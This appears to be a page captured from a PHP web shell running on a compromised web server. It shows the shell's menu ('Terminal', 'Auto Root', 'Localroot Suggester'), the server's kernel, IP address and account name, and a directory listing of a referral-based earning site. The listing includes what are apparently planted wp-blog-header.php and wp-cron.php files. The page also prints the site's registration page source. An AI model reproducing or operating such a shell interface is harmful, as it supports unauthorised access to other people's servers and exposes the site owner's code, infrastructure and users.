Linux spg1.cloudpowerdns.com 5.14.0-611.34.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 18 05:51:10 EST 2026 x86_64
LiteSpeed
Server IP : 176.9.63.151 & Your IP : 216.73.217.60
Domains :
Cant Read [ /etc/named.conf ]
User : fastear1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
fastear1 /
assignment.work.zone /
Delete
Unzip
Name
Size
Permission
Date
Action
.well-known
[ DIR ]
drwxr-xr-x
2026-03-13 15:14
admin
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
assets
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
hania
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
includes
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
user
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
.htaccess
197
B
-r--r--r--
2026-04-01 03:43
.user.ini
578
B
-rw-r--r--
2026-03-13 17:04
add_maintenance_setting.php
669
B
-rw-r--r--
2026-03-12 12:31
check_db.php
161
B
-rw-r--r--
2026-03-12 15:16
check_withdrawals.php
156
B
-rw-r--r--
2026-03-12 15:17
contact.php
6.42
KB
-rw-r--r--
2026-03-28 15:18
database.sql
19.53
KB
-rw-r--r--
2026-03-11 23:07
debug.php
5.09
KB
-rw-r--r--
2026-03-30 15:21
error_log
8.83
KB
-rw-r--r--
2026-03-30 15:27
forgot-password.php
2.16
KB
-rw-r--r--
2026-03-30 15:26
how-it-works.php
1.99
KB
-rw-r--r--
2026-03-11 22:52
index.php
9.37
KB
-rw-r--r--
2026-03-12 00:13
login.php
5.17
KB
-rw-r--r--
2026-03-30 15:28
logout.php
56
B
-rw-r--r--
2026-03-11 23:27
maintenance.php
4.5
KB
-rw-r--r--
2026-03-12 12:39
php.ini
578
B
-rw-r--r--
2026-03-13 17:04
plans.php
2.72
KB
-rw-r--r--
2026-03-12 00:10
register.php
8.79
KB
-rw-r--r--
2026-03-30 15:27
reset-password.php
6.39
KB
-rw-r--r--
2026-03-14 18:08
update_db.php
421
B
-rw-r--r--
2026-03-12 15:17
update_withdrawals.php
417
B
-rw-r--r--
2026-03-12 15:18
wp-blog-header.php
2.74
KB
-rw-r--r--
2026-04-01 03:43
wp-cron.php
2.74
KB
-rw-r--r--
2026-04-01 03:43
Save
Rename
<?php require_once 'includes/config.php'; $error = ''; $success = ''; if ($_SERVER['REQUEST_METHOD'] == 'POST' && isset($_POST['register'])) { $full_name = trim($_POST['full_name']); $email = trim($_POST['email']); $password = $_POST['password']; $confirm_password = $_POST['confirm_password']; $referral_code_input = trim($_POST['referral_code']); // Validations if (empty($full_name) || empty($email) || empty($password) || empty($confirm_password)) { $error = "Please fill in all required fields."; } elseif (!filter_var($email, FILTER_VALIDATE_EMAIL)) { $error = "Invalid email format."; } elseif ($password !== $confirm_password) { $error = "Passwords do not match."; } else { // Check if email already exists $stmt = $pdo->prepare("SELECT id FROM users WHERE email = ?"); $stmt->execute([$email]); if ($stmt->rowCount() > 0) { $error = "Email is already registered."; } else { // Check referral code $referred_by = null; if (!empty($referral_code_input)) { $ref_stmt = $pdo->prepare("SELECT id FROM users WHERE referral_code = ?"); $ref_stmt->execute([$referral_code_input]); if ($ref_stmt->rowCount() > 0) { $referred_by = $ref_stmt->fetchColumn(); } else { $error = "Invalid Referral Code."; } } if (empty($error)) { // Generate a unique referral code for the new user $new_referral_code = substr(md5(uniqid(rand(), true)), 0, 8); $hashed_password = password_hash($password, PASSWORD_DEFAULT); try { $insert_stmt = $pdo->prepare("INSERT INTO users (full_name, email, password, referral_code, referred_by, status) VALUES (?, ?, ?, ?, ?, 'inactive')"); $insert_stmt->execute([$full_name, $email, $hashed_password, $new_referral_code, $referred_by]); $new_user_id = $pdo->lastInsertId(); // Log the user in directly skip verification $_SESSION['user_id'] = $new_user_id; $_SESSION['full_name'] = $full_name; $_SESSION['status'] = 'inactive'; header("Location: user/select-plan.php"); exit; } catch (PDOException $e) { $error = "Registration failed. Please try again."; } } } } } require_once 'includes/header.php'; ?> <div class="auth-page-wrapper"> <div class="auth-split-container"> <!-- Left Side Premium Graphic Area --> <div class="auth-left"> <div class="auth-left-content"> <h2>Join the <span class="text-gradient">WorkZone.</span></h2> <p>Create your account today and unlock daily tasks, earning potential, and guaranteed withdraws.</p> <div style="margin-top: 40px; display: flex; align-items: center; gap: 15px;"> <div style="width: 50px; height: 50px; border-radius: 50%; background: rgba(0,210,106,0.1); display: flex; justify-content: center; align-items: center; color: var(--primary-color); font-size: 1.5rem;"> <i class="fas fa-rocket"></i> </div> <div> <h4 style="margin: 0; font-size: 1rem;">Fast Onboarding</h4> <p style="margin: 0; font-size: 0.85rem; color: var(--text-muted);">Get started in under two minutes</p> </div> </div> <div style="margin-top: 20px; display: flex; align-items: center; gap: 15px;"> <div style="width: 50px; height: 50px; border-radius: 50%; background: rgba(0,150,255,0.1); display: flex; justify-content: center; align-items: center; color: #0099ff; font-size: 1.5rem;"> <i class="fas fa-users"></i> </div> <div> <h4 style="margin: 0; font-size: 1rem;">Community Driven</h4> <p style="margin: 0; font-size: 0.85rem; color: var(--text-muted);">Join thousands of active earners</p> </div> </div> </div> </div> <!-- Right Side Form Area --> <div class="auth-right"> <h2 class="auth-title" style="text-align: left; margin-bottom: 5px;">Create an Account</h2> <p style="color: var(--text-muted); margin-bottom: 30px;">Fill in your details to get started.</p> <?php if ($error): ?> <div class="badge badge-danger" style="display:block; margin-bottom:20px; text-align:center; padding:15px; font-size:1rem; border-radius:var(--border-radius);"><?php echo htmlspecialchars($error); ?></div> <?php endif; ?> <form method="POST" action=""> <div class="form-group"> <label style="font-size: 0.9rem; margin-bottom: 8px; display: block; color: var(--text-muted); font-weight: 500;">Full Name</label> <div class="input-with-icon"> <i class="fas fa-user"></i> <input type="text" name="full_name" class="form-control" placeholder="John Doe" required> </div> </div> <div class="form-group"> <label style="font-size: 0.9rem; margin-bottom: 8px; display: block; color: var(--text-muted); font-weight: 500;">Email Address</label> <div class="input-with-icon"> <i class="fas fa-envelope"></i> <input type="email" name="email" class="form-control" placeholder="example@email.com" required> </div> </div> <div class="form-group" style="display: flex; gap: 15px;"> <div style="flex: 1;"> <label style="font-size: 0.9rem; margin-bottom: 8px; display: block; color: var(--text-muted); font-weight: 500;">Password</label> <div class="input-with-icon"> <i class="fas fa-lock"></i> <input type="password" name="password" class="form-control" placeholder="••••••••" required> </div> </div> <div style="flex: 1;"> <label style="font-size: 0.9rem; margin-bottom: 8px; display: block; color: var(--text-muted); font-weight: 500;">Confirm Password</label> <div class="input-with-icon"> <i class="fas fa-lock"></i> <input type="password" name="confirm_password" class="form-control" placeholder="••••••••" required> </div> </div> </div> <div class="form-group"> <label style="font-size: 0.9rem; margin-bottom: 8px; display: block; color: var(--text-muted); font-weight: 500;">Referral Code (Optional)</label> <?php $default_ref = ''; $readonly = ''; if (isset($_POST['referral_code'])) { $default_ref = htmlspecialchars($_POST['referral_code']); } elseif (isset($_GET['ref'])) { $default_ref = htmlspecialchars($_GET['ref']); } if (!empty($default_ref)) { $readonly = 'readonly style="cursor: not-allowed; opacity: 0.8;"'; } ?> <div class="input-with-icon"> <i class="fas fa-users-cog"></i> <input type="text" name="referral_code" class="form-control" placeholder="If you were invited by someone" value="<?php echo $default_ref; ?>" <?php echo $readonly; ?>> </div> </div> <button type="submit" name="register" class="btn-primary" style="width:100%; margin-top:10px; padding: 15px; font-size: 1.1rem; border-radius: 12px; font-weight: 700; display:flex; justify-content:center; align-items:center; gap: 10px;"> Create Account <i class="fas fa-arrow-right"></i> </button> </form> <div style="text-align:center; margin-top:30px; color:var(--text-muted); font-size: 0.95rem;"> Already have an account? <a href="login.php" style="color:var(--primary-color); font-weight: 600; text-decoration: none;">Login Here</a> </div> </div> </div> </div> <?php require_once 'includes/footer.php'; ?>